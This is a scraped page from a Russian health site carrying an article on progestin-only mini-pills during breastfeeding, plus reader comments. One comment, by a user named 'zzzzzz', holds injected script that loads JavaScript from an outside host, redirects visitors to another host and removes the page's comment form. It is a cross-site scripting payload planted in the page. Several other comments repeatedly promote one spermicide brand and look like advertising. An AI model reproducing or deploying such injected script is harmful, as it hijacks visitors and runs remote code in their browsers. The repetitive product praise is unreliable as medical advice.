Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Оральная контрацепция и г...  >>  Оральная контрацепция и грудное вскармливание
 
Обратная связь
 

Оральная контрацепция и грудное вскармливание

Размер шрифта
Алла Пилунова / «Здоровье-инфо»
08 июня 2012 07:00
  • google_analytics: false
  • Нравится

Гормональная контрацепция – надежный способ защиты женщины во время грудного вскармливания. Однако нужно знать некоторые нюансы.

При постановке вопроса об оральной контрацепции во время лактации большая часть гинекологов склоняет свой выбор в пользу мини-пили. И это не зря.

Организм женщины в период лактации

Благодаря заложенным природой механизмам, при грудном вскармливании у женщины развивается физиологическое бесплодие, или лактационная аменорея. Но это не является гарантией того, что беременность не наступит. Фолликул способен созревать на протяжении всего периода лактации и до начала менструации. Может произойти овуляция – выход из яичника зрелой яйцеклетки, способной к оплодотворению, – и наступить беременность. Поэтому до начала менструального цикла в период грудного вскармливания очень важно использовать оральные контрацептивы.

Состав мини-пили

Мини-пили, или минимальные пилюли, – это чисто прогестиновые оральные контрацептивы, содержащие минимальные дозы гормона, чем они и отличаются от комбинированных оральных контрацептивов (КОК), хоть и относятся к одной с ними группе оральных контрацептивов.

Прогестиновые таблетки содержат только один гормон прогестин – это синтетический аналог гормона прогестерона, который вырабатывается в яичниках. В мини-пили прогестин содержится в микродозе – 300-500 мкг. Чисто прогестиновые препараты оказывают довольно мягкое воздействие на женский организм, не влияя на состав и вкус материнского молока. При этом мини-пили показывают высокую эффективность контрацептивного действия: 0,5 беременностей на 100 женщин в течение года использования (95%), что не намного ниже эффективности КОК, дающих 99%.

Механизм действия

Мини-пили, как известно, не подавляют овуляцию. Контрацептивный эффект этих препаратов полностью зависит от механизма их действия:
  • Во-первых, он заключен в изменении качества слизи шейки матки. Слизь становится более густой и образует непреодолимую преграду для сперматозоидов, которые не могут встретиться с яйцеклеткой.
  • Но если сперматозоид все-таки проходит через слизь шейки матки и оплодотворяет яйцеклетку, тогда начинает действовать другой защитный механизм: изменяется слизистая оболочка матки, из-за чего эмбрион не способен к ней прикрепиться.
  • Есть еще одна особенность воздействия мини-пили: замедление движения, или перистальтики, мышечной оболочки маточных труб, благодаря чему яйцеклетка не попадает в полость матки.

Нюансы приема

Мини-пили относятся к препаратам, эффективность которых зависит от правильности приема:

  • Обязателен ежедневный прием в течение 365 дней в году;
  • Принимать мини-пили необходимо в одно и то же время дня.
  • Лучшее время для приема таблетки – 18-19 часов. Так как максимальный контрацептивный эффект развивается через 4-5 часов после приема, а половые акты чаще случаются именно в ночные часы, то прием мини-пили рекомендуется в вечернее время. Контрацепция при помощи мини-пили является эффективной при половых актах и в другое время суток, но оптимального эффекта мини-пили достигают при соблюдении вышеописанных условий.

Таким образом, прием мини-пили в период грудного вскармливания обеспечивает высокую контрацептивную эффективность при отсутствии негативного воздействия на лактационную способность женщины и состав ее молока. Но следует помнить, что после прекращения кормления грудью и возобновления менструального цикла, следует еще раз проконсультироваться у гинеколога по поводу возможного перехода на КОК.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

12 апреля 2014 в 20:11

Комментарий удален за нарушение Правил общения

2 - Гость

09 августа 2014 в 22:34

Комментарий удален за нарушение Правил общения

3 - Гость

27 августа 2014 в 23:26

Комментарий удален за нарушение Правил общения

4 - Гость

31 августа 2014 в 23:18

Комментарий удален за нарушение Правил общения

5 - Гость

30 мая 2015 в 12:15

Цитировать   |   Пожаловаться

Мне во время ГВ гинеколог рекомендовала свечами пользоваться, так как это надежное и не гормональное средство.

6 - Гость

14 июня 2015 в 23:00

Комментарий удален за нарушение Правил общения

7 - Гость

24 июня 2015 в 19:03

Цитировать   |   Пожаловаться

Я вообще против приема гормональных препаратов, я доверяю своему врачу, а она мне рекомендовала пользоваться свечами Ноноксинол.

8 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

9 - Гость

14 октября 2015 в 10:12

Цитировать   |   Пожаловаться

Мне мой гинеколог не рекомендовал принимать гормональные препараты, по этому я предпочитаю все-таки свечи, особенно хорошо подошли Ноноксинол.

10 - Гость

19 октября 2015 в 11:50

Цитировать   |   Пожаловаться

Я принимала гормоны только тогда, когда был гормональный сбой в организме, так просто пить годами ОК для контрацепции я бы не стала. Предпочитаю барьерный метод контрацепции, уже долгое время с мужем предохраняемся свечами Ноноксинол и очень довольны.

1 | 2 Следующая

Статьи

       
У вас обвиснет грудь! Из-за этих привычек!   Как обследовать свою грудь?   Можно ли сбросить вес после родов?   Все что вы хотели знать о презервативах  
01 января 2013Скажи мне, где ты работаешь, и я скажу, будет ли у тебя рак груди 10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом
 
09 июля 2012Ученые выяснили, какой вид контрацепции надежнее! 24 февраля 2012"СМСмаме" - новая программа для беременных и молодых мам
 

Слайдшоу

1
Мифы о лифчике!
Как изменить будущее и не заболеть раком груди?
Вы и не знали, на что способны противозачаточные!

Тесты

Что вы знаете о грудном вскармливании?
Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.